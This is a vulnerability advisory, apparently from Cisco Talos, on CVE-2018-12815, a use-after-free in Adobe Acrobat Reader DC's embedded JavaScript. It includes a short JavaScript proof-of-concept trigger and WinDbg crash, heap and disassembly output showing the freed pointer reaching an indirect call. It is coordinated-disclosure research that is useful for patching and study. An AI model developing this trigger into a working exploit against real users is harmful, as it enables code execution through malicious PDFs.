CVE-2018-12815
A specific JavaScript code embedded in a PDF file can lead to a use-after-free condition when opening a PDF document in Adobe Acrobat Reader DC 2018.011.20038. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.
Adobe Acrobat Reader DC 2018.011.20038
6.8 - CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H
CWE-416: Use After Free
Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. The one method call required to trigger this vulnerability is privileged, and can only be called from trusted functions or from a trusted location.
Adobe Acrobat Reader DC supports embedded JavaScript code in the PDF to allow for interactive PDF forms. This gives the potential attacker the ability to precisely control memory layout, and poses additional attack surfaces.
While executing the following piece of code, a cache misuse can lead to a dereference of a previously freed object, which can cause further memory corruption:
this.Net.Subscriptions.addUI({},[],'b');
this.spell.languages;
a = this.Collab.drivers;
this.SetRSSMethods('a',{});
JSON.stringify(a);
While executing JSON.stringify() method on indirect reference to this.Collab.drivers object, an invalid pointer is retrieved, leading to a crash on the following address:
(100c.174c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=253b8ef8 ebx=00000000 ecx=5ef4a370 edx=5ef4a378 esi=1def2fc0 edi=6e866fb8
eip=5ebd7790 esp=001ac550 ebp=001ac570 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
Annots!PlugInMain+0x7388f:
5ebd7790 8b10 mov edx,dword ptr [eax] ds:0023:253b8ef8=????????
Stepping back, we can see that pointer in eax comes from the following function call:
0:000> u eip-14
Annots!PlugInMain+0x7387b:
5ebd777c 6870a3f45e push offset Annots!PlugInMain+0x3e646f (5ef4a370)
5ebd7781 ff7508 push dword ptr [ebp+8]
5ebd7784 ff90cc000000 call dword ptr [eax+0CCh]
0:000> da Annots!PlugInMain+0x3e646f
5ef4a370 "CRSSFeedUI"
This is an indirect call to cachehash methods in EScript.api referencing CRSSFeedUI object, and a pointer to a freed object is returned:
0:000> !heap -p -a eax
address 253b8ef8 found in
_DPH_HEAP_ROOT @ 1b1000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
252b14ac: 253b8000 2000
6b1e90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
774969cc ntdll!RtlDebugFreeHeap+0x0000002f
77459e07 ntdll!RtlpFreeHeap+0x0000005d
774263a6 ntdll!RtlFreeHeap+0x00000142
7565c614 kernel32!HeapFree+0x00000014
6901ecfa MSVCR120!free+0x0000001a [f:\dd\vctools\crt\crtw32\heap\free.c @ 51]
610c524f EScript!PlugInMain+0x000026b0
610c5206 EScript!PlugInMain+0x00002667
61101c50 EScript!mozilla::HashBytes+0x000315da
610d388f EScript!mozilla::HashBytes+0x00003219
610d32f3 EScript!mozilla::HashBytes+0x00002c7d
611f5d4c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf067
611f6342 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf65d
611f5baf EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000ceeca
611f633b EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf656
611f7140 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000d045b
611f518e EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000ce4a9
610f75ce EScript!mozilla::HashBytes+0x00026f58
610f17da EScript!mozilla::HashBytes+0x00021164
610f0606 EScript!mozilla::HashBytes+0x0001ff90
610f0511 EScript!mozilla::HashBytes+0x0001fe9b
610f0458 EScript!mozilla::HashBytes+0x0001fde2
610d9e2e EScript!mozilla::HashBytes+0x000097b8
611185ec EScript!mozilla::HashBytes+0x00047f76
61118370 EScript!mozilla::HashBytes+0x00047cfa
61117de3 EScript!mozilla::HashBytes+0x0004776d
61116cd5 EScript!mozilla::HashBytes+0x0004665f
61186428 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f743
58e4ed5d AcroRd32!AIDE::PixelPartInfo::operator=+0x000e450d
58d8cb1e AcroRd32!AIDE::PixelPartInfo::operator=+0x000222ce
58d8922c AcroRd32!AIDE::PixelPartInfo::operator=+0x0001e9dc
58bdefca AcroRd32!AX_PDXlateToHostEx+0x0015a229
If we examine the code immediately following the point of the crash, we can see the following:
0:000> u eip
Annots!PlugInMain+0x7388f:
5ebd7790 8b10 mov edx,dword ptr [eax]
5ebd7792 8d4df0 lea ecx,[ebp-10h]
5ebd7795 51 push ecx
5ebd7796 8bc8 mov ecx,eax
5ebd7798 ff5248 call dword ptr [edx+48h]
Since the area of the freed memory is quickly used in an indirect call instruction, having control over the contents of this freed memory region can lead to arbitrary code execution.
It should be noted that this issue is very similar in nature to TALOS-2018-0569.
0:000> g
(17e0.153c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=253b8ef8 ebx=00000000 ecx=5f1ca370 edx=5f1ca378 esi=1dea2fc0 edi=6e66cfb8
eip=5ee57790 esp=0052c948 ebp=0052c968 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
Annots!PlugInMain+0x7388f:
5ee57790 8b10 mov edx,dword ptr [eax] ds:0023:253b8ef8=????????
0:000> !heap -p -a eax
address 253b8ef8 found in
_DPH_HEAP_ROOT @ 61000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
252b14ac: 253b8000 2000
66d590b2 verifier!AVrfDebugPageHeapFree+0x000000c2
774969cc ntdll!RtlDebugFreeHeap+0x0000002f
77459e07 ntdll!RtlpFreeHeap+0x0000005d
774263a6 ntdll!RtlFreeHeap+0x00000142
7565c614 kernel32!HeapFree+0x00000014
6901ecfa MSVCR120!free+0x0000001a [f:\dd\vctools\crt\crtw32\heap\free.c @ 51]
5f50524f EScript!PlugInMain+0x000026b0
5f505206 EScript!PlugInMain+0x00002667
5f541c50 EScript!mozilla::HashBytes+0x000315da
5f51388f EScript!mozilla::HashBytes+0x00003219
5f5132f3 EScript!mozilla::HashBytes+0x00002c7d
5f635d4c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf067
5f636342 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf65d
5f635baf EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000ceeca
5f63633b EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf656
5f637140 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000d045b
5f63518e EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000ce4a9
5f5375ce EScript!mozilla::HashBytes+0x00026f58
5f5317da EScript!mozilla::HashBytes+0x00021164
5f530606 EScript!mozilla::HashBytes+0x0001ff90
5f530511 EScript!mozilla::HashBytes+0x0001fe9b
5f530458 EScript!mozilla::HashBytes+0x0001fde2
5f519e2e EScript!mozilla::HashBytes+0x000097b8
5f5585ec EScript!mozilla::HashBytes+0x00047f76
5f558370 EScript!mozilla::HashBytes+0x00047cfa
5f557de3 EScript!mozilla::HashBytes+0x0004776d
5f556cd5 EScript!mozilla::HashBytes+0x0004665f
5f5c6428 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f743
5a57ed5d AcroRd32!AIDE::PixelPartInfo::operator=+0x000e450d
5a4bcb1e AcroRd32!AIDE::PixelPartInfo::operator=+0x000222ce
5a4b922c AcroRd32!AIDE::PixelPartInfo::operator=+0x0001e9dc
5a30efca AcroRd32!AX_PDXlateToHostEx+0x0015a229
0:000> k
# ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0052c968 5f53d6ca Annots!PlugInMain+0x7388f
01 0052c9d8 5f541c50 EScript!mozilla::HashBytes+0x2d054
02 0052ca08 5f51388f EScript!mozilla::HashBytes+0x315da
03 0052ca98 5f5132f3 EScript!mozilla::HashBytes+0x3219
04 0052cab4 5f635d4c EScript!mozilla::HashBytes+0x2c7d
05 0052cb74 5f636342 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xcf067
06 0052cc08 5f635baf EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xcf65d
07 0052cc54 5f63633b EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xceeca
08 0052cce8 5f637140 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xcf656
09 0052ce8c 5f63518e EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xd045b
0a 0052cf28 5f5375ce EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0xce4a9
0b 0052cf9c 5f5317da EScript!mozilla::HashBytes+0x26f58
0:000> u
Annots!PlugInMain+0x7388f:
5ee57790 8b10 mov edx,dword ptr [eax]
5ee57792 8d4df0 lea ecx,[ebp-10h]
5ee57795 51 push ecx
5ee57796 8bc8 mov ecx,eax
5ee57798 ff5248 call dword ptr [edx+48h]
5ee5779b 8365fc00 and dword ptr [ebp-4],0
5ee5779f 8bc8 mov ecx,eax
5ee577a1 8b35000d2c5f mov esi,dword ptr [Annots!PlugInMain+0x4dcdff (5f2c0d00)]
2018-05-08 - Vendor Disclosure
2018-07-10 - Public Release
Discovered by Aleksandar Nikolic of Cisco Talos.